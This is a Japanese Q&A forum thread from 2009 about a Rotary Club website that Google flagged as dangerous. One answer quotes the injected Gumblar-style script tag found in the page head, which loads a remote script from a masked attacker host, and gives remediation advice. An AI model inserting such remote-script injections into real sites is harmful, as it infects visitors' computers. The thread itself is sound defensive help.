googleで危険と判定され、ブロックされたwebサイトについて

締切済

質問者：moto-kit
質問日時：2009/12/20 21:55
回答数：5件

家内が制作を請け負っているwebサイトが、先月からgoogleでブロックされたまま解除されません。URL:http://www.yasurc.***/　です。
このサイトは国際的奉仕団体であるロータリークラブの支部のもので、決しておかしなサイトではありません。googleの判定によれば、
「このウェブサイトにアクセスすると、コンピュータに損害が生じる可能性があります。」とのことで、セーフブラウジングのページを開くと、「yasurc.*** の現在のステータス：疑わしいサイトとして認識されています。このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
過去 90 日間に、このサイトの一部で不審な動きが 1 回報告されています。
Google による巡回テスト状況：このサイトで過去 90 日間に Google がテストした 13 ページのうち 3 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。Google が最後にこのサイトを巡回したのは2009-12-10で、このサイトで不審なコンテンツが最後に検出されたのは2009-11-17です。」という内容で、どうもスパイウェアに感染したような意味にとれます。　一度原ファイルをウィルスソフトで完全スキャンした上で、サーバー上のすべてのファイルを削除し、改めてサイトを転送し直しましたが、未だに上記の表示が出ます。ただ、11/17以降はその不審なコンテンツは見つかっていないようなので、今のwebページはたぶん大丈夫のようです。googleのこのブロックを解除する方法がわかりません。どなたかご教授願います。ちなみに、gooやyahoo!から検索すると何も引っかかりません。　

通報する

この質問への回答は締め切られました。

質問の本文を隠す

回答 (5件)

最新から表示
回答順に表示

No.5

回答者： John_Papa
回答日時：2009/12/24 16:44

大変でしょうが、ご検討をお祈りします。

ウイルスが片付きましたら、サイトのファイルを点検もしくは、全削除してアップロードしなおして、デトロイトのサーバーのように、ウイルスもしくはそのダウンロードスクリプトの置き場にされる懸念を払拭してください。ハードディスク付きテレビでさえボットネットに取り込まれる時世ですから。
「家電もマルウェアに感染する時代」
http://www.itmedia.co.jp/enterprise/articles/091 …

まだ、この相談は閉じられてないようですから蛇足ながら読者の参考になればと、ここを借りてGumblar系ウイルスについて最近の状況を記しておきます。

Gumblar系ウイルスはごく普通のサイトに仕掛けられています。サイト管理者も換算されたことを知らないで他人から知らされるのがほとんどです。
そして統計的なデータでは日本のインターネット加入者15人に一人は自分のＰＣが感染している事を知りません。
その数値の根拠は「実はBlasterやNetsky並み？静かにはびこるGumblar」
http://www.atmarkit.co.jp/fsecurity/column/kawag …
にあります。

最近ニュースになったホットなものには、
「JR東日本のサイトが約2週間にわたり改ざん状態 - 閲覧でウイルス感染のおそれ」
http://www.security-next.com/011734.html
というように、感染サイトを選びません。
セキュリティソフトメーカーには、もっと対策努力を期待します。現状はザルよりひどい状況と言わざるを得ません。感染したＰＣではもはやそのウイルスを検出できないという悩ましい状況もあります。

対策(自己防衛策)は
「相次ぐ「Webウイルス」に緊急警告、Adobe ReaderやFlashを最新版に」
http://pc.nikkeibp.co.jp/article/news/20091224/1 …
それと、WindowsUpdate・MicrosoftUpdateの最新版を適応しておくこと、IE7以前のブラウザを使用しないことなどが挙げられます。
一応12月7日のセキュリティ更新プログラムで対策されましたけど、この更新前のIE6やIE7で改ざんされたサイトを閲覧したら防ぎようが無かったのです。
http://www.microsoft.com/japan/technet/security/ …

ネット加入者15人に一人は感染者。決して人事ではない数字の筈です。

- 0
- 件

通報する

この回答へのお礼

重ね重ねありありがとうございました。大変参考になりました。インターネットは便利な反面、怖い面があることを改めて教えて頂きました。

通報する

お礼日時：2009/12/24 21:12

No.4

回答者： John_Papa
回答日時：2009/12/21 11:00

No.3です。

現在、デトロイトの個人宅サーバーは稼動中です。
問題のスクリプトは、5.6Kバイトの暗号化されたスクリプトでした。
Kaspersky で Trojan-Downloader.JS.Gumblar.x
Trendmicroではない同名のVirusBuster で JS.Crypt.DMX
として検出されます。Gumblarスクリプトの検出率はいつもこの程度です。
http://www.virustotal.com/jp/analisis/98eca65a2b …

FTPによる改ざんなら、ＯＣＮにver/log/xferlogの調査を依頼して、特に海外ＩＰからのFTP接続が無いか調べてもらってください。
ご使用のOCNのWebサーバーが調査ではRapidsite/Apaと出るのですが、ターミナル(SSH)のセキュリティに脆弱性があるようにも見うけられます。
http://www.osbsd.net/2005/08/rapidsiteapa.html
SSHへの攻撃やLoginは同様にver/log/messagesに記録されていますので調べてもらってください。
IPA(独立行政法人情報処理推進機構)に届けを出すためにLOGを貰うと良いでしょう。
またIPAで指導もしてもらえるでしょう。
http://www.ipa.go.jp/security/index.html

- 0
- 件

通報する

この回答へのお礼

再度、大変詳しい説明をしていただき、感謝の言葉もありません。ただ、このレベルまでくると、私の拙い知識では対処しかねますので、いただいた情報をもとに専門業者に頼んでみようと思います。重ね重ねありがとうございました。

通報する

お礼日時：2009/12/22 22:58

No.3

回答者： John_Papa
回答日時：2009/12/21 02:11

サイトのトップページを調べさせていただきました。

URLは伏字にしましたが、次の２行目に覚えがなければバッチリ【改ざん】されています。
----------------------------
</HEAD>
<script src=http://***.us/***/robots.php ></script>
<BODY background="syuho/kabe27.jpg" link="#0000ff">
----------------------------
暗号化されていないためカスペルスキーやavast!でも無警告です。
挿入位置は、５月頃のGumblarと同じく</HEAD>と<BODY>の間です。
改ざん犯は以前と違ってスクリプトを暗号化しなくなっています。
このアドレスはデトロイトの個人宅サーバーのようですが、私のアクセスした時間には稼動していなかったようで、指定されたスクリプトにアクセスできませんでした。
稼動中なら感染攻撃を受けたでしょう。
この作業は危険ですのでまねしないように。

googleの警告は全く正しく行われていると言えるでしょう。

考えられる事は、moto-kitさんの奥様のＰＣもしくはＰＣの繋がっているＬＡＮのＰＣやサーバーがGumblar系のウイルスに感染しています。
最近のGumblarウイルスはほとんど症状に気がつきません。またウイルス対策ソフトから身を隠す術を持っています。
ウイルス定義の自動更新ができていないなら感染可能性大です。
手動でもウイルス定義が更新できないようでしたら、職業上ＰＣのリカバリをお勧めします。また、サイトのＦＴＰパスワードの変更も必要です。
FTPログインする人が他にいるなら、そちらに感染があるのかも知れません。

- 0
- 件

通報する

この回答へのお礼

大変詳しい解説と、危険を伴う分析までしていただき、ありがとうございました。ソースを確認したのですが、ご指摘頂いたスクリプトの記述は、もちろん覚えがありませんが、どこにあるのか私には見つけられませんでした。ただ、googleに再審査依頼をしたところ、やはり状態は同じでしたので、改善はされていませんでした。PCのリカバリは、その手間を考えると逡巡してしまうのですが、検討させて頂きます。FTPパスワードは変更してみます。他にはログインする人はいません。

通報する

お礼日時：2009/12/22 22:56